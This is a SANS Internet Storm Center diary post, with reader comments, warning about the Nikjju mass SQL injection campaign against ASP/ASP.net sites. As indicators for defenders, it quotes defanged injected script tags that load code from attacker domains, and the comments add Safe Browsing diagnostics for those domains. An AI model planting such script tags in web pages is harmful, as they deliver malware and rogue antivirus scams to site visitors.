Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Continued interest in Nikjju mass SQL injection campaign - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Continued interest in Nikjju mass SQL injection campaign

Readers continue to write in conveying updates from sources regarding the Nikjju mass SQL injection campaign. Like the Lilupophilupop campaign from December, ASP/ASP.net sites are target and scripts inserted.

Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src = hxxp://hgbyju.com/r.php <</script> and the resulting fake/rogue AV campaigns they subject victims to.

Infected site count estimations vary wildly but a quick search of the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the lihupophilupop campaign but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.

As always if you have logs to share send them our way via the contact form or any comment with any insight you want to share with readers.

Russ McRee | @holisticinfosec

 

 

Russ McRee

182 Posts
ISC Handler
Has anyone posted the initial SQL Injection attack payload?
Anonymous
@ Ryan ... 'along those lines:
- http://google.com/safebrowsing/diagnostic?site=nikjju.com
"... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
- http://google.com/safebrowsing/diagnostic?site=hgbyju.com
"... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
- http://google.com/safebrowsing/diagnostic?site=AS:42926
"... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."
.
Jack

160 Posts

Sign Up for Free or Log In to start participating in the conversation!